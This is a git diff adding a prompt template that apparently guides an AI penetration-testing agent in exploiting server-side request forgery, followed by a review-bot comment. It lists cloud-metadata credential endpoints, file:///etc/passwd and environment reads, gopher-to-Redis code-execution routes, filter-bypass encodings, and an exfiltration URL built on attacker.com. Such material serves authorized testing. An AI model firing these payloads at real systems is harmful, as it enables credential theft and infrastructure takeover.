Open-source release for Alpha version
168
strix/prompts/vulnerabilities/ssrf.jinja
Normal file
@@ -0,0 +1,168 @@
<ssrf_vulnerability_guide>
<title>SERVER-SIDE REQUEST FORGERY (SSRF) - ADVANCED EXPLOITATION</title>

<critical>SSRF can lead to internal network access, cloud metadata theft, and complete infrastructure compromise.</critical>

<common_injection_points>
- URL parameters: url=, link=, path=, src=, href=, uri=
- File import/export features
- Webhooks and callbacks
- PDF generators (wkhtmltopdf)
- Image processing (ImageMagick)
- Document parsers
- Payment gateways (IPN callbacks)
- Social media card generators
- URL shorteners/expanders
</common_injection_points>

<hidden_contexts>
- Referer headers in analytics
- Link preview generation
- RSS/Feed fetchers
- Repository cloning (Git/SVN)
- Package managers (npm, pip)
- Calendar invites (ICS files)
- OAuth redirect_uri
- SAML endpoints
- GraphQL field resolvers
</hidden_contexts>

<cloud_metadata>
<aws>
Legacy: http://169.254.169.254/latest/meta-data/
IMDSv2: Requires token but check if app proxies headers
Key targets: /iam/security-credentials/, /user-data/
</aws>

<google_cloud>
http://metadata.google.internal/computeMetadata/v1/
Requires: Metadata-Flavor: Google header
Target: /instance/service-accounts/default/token
</google_cloud>

<azure>
http://169.254.169.254/metadata/instance?api-version=2021-02-01
Requires: Metadata: true header
OAuth: /metadata/identity/oauth2/token
</azure>
</cloud_metadata>

<internal_services>
<port_scanning>
Common ports: 21,22,80,443,445,1433,3306,3389,5432,6379,8080,9200,27017
</port_scanning>

<service_fingerprinting>
- Elasticsearch: http://localhost:9200/_cat/indices
- Redis: dict://localhost:6379/INFO
- MongoDB: http://localhost:27017/test
- Docker: http://localhost:2375/v1.24/containers/json
- Kubernetes: https://kubernetes.default.svc/api/v1/
</service_fingerprinting>
</internal_services>

<protocol_exploitation>
<gopher>
Redis RCE, SMTP injection, FastCGI exploitation
</gopher>

<file>
file:///etc/passwd, file:///proc/self/environ
</file>

<dict>
dict://localhost:11211/stat (Memcached)
</dict>
</protocol_exploitation>

<bypass_techniques>
<dns_rebinding>
First request → your server, second → 127.0.0.1
</dns_rebinding>

<encoding_tricks>
- Decimal IP: http://2130706433/ (127.0.0.1)
- Octal: http://0177.0.0.1/
- Hex: http://0x7f.0x0.0x0.0x1/
- IPv6: http://[::1]/, http://[::ffff:127.0.0.1]/
</encoding_tricks>

<url_parser_confusion>
- Authority: http://expected@evil/
- Unicode: http://⑯⑨。②⑤④。⑯⑨。②⑤④/
</url_parser_confusion>

<redirect_chains>
302 → yourserver.com → 169.254.169.254
</redirect_chains>
</bypass_techniques>

<advanced_techniques>
<blind_ssrf>
- DNS exfiltration: http://$(hostname).attacker.com/
- Timing attacks for network mapping
- Error-based detection
</blind_ssrf>

<ssrf_to_rce>
- Redis: gopher://localhost:6379/ (cron injection)
- Memcached: gopher://localhost:11211/
- FastCGI: gopher://localhost:9000/
</ssrf_to_rce>
</advanced_techniques>

<filter_bypasses>
<localhost>
127.1, 0177.0.0.1, 0x7f000001, 2130706433, 127.0.0.0/8, localtest.me
</localhost>

<parser_differentials>
http://evil.com#@good.com/, http:evil.com
</parser_differentials>

<protocols>
dict://, gopher://, ftp://, file://, jar://, netdoc://
</protocols>
</filter_bypasses>

<validation_techniques>
To confirm SSRF:
1. External callbacks (DNS/HTTP)
2. Internal network access (different responses)
3. Time-based detection (timeouts)
4. Cloud metadata retrieval
5. Protocol differentiation
</validation_techniques>

<false_positive_indicators>
NOT SSRF if:
- Only client-side redirects
- Whitelist properly blocking
- Generic errors for all URLs
- No outbound requests made
- Same-origin policy enforced
</false_positive_indicators>

<impact_demonstration>
- Cloud credential theft (AWS/GCP/Azure)
- Internal admin panel access
- Port scanning results
- SSRF to RCE chain
- Data exfiltration
</impact_demonstration>

<pro_tips>
1. Always check cloud metadata first
2. Chain with other vulns (SSRF + XXE)
3. Use time delays for blind SSRF
4. Try all protocols, not just HTTP
5. Automate internal network scanning
6. Check parser quirks (language-specific)
7. Monitor DNS for blind confirmation
8. Try IPv6 (often forgotten)
9. Abuse redirects for filter bypass
10. SSRF can be in any URL-fetching feature
</pro_tips>

<remember>SSRF is often the key to cloud compromise. A single SSRF in cloud = complete account takeover through metadata access.</remember>
</ssrf_vulnerability_guide>
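Review bot: The "Same-origin policy enforced" entry under <false_positive_indicators> is wrong for this bug class: the same-origin policy is a browser-side control and says nothing about whether the server itself issued an outbound request, so an agent applying this list would discount genuine findings; drop it or replace it with a server-side condition such as "outbound egress blocked at the network layer". Two smaller points in the same hunk: <dns_rebinding>, <redirect_chains> and <blind_ssrf> hard-code placeholder hosts ("your server", yourserver.com, attacker.com) in a .jinja file that otherwise contains no Jinja syntax, so the callback host should come from a template variable rendered at run time rather than a literal the model may reproduce verbatim; and `$(hostname)` in the DNS-exfiltration URL is shell command substitution that only expands if the URL passes through a shell, which nothing in the guide states, so either document that precondition or remove it.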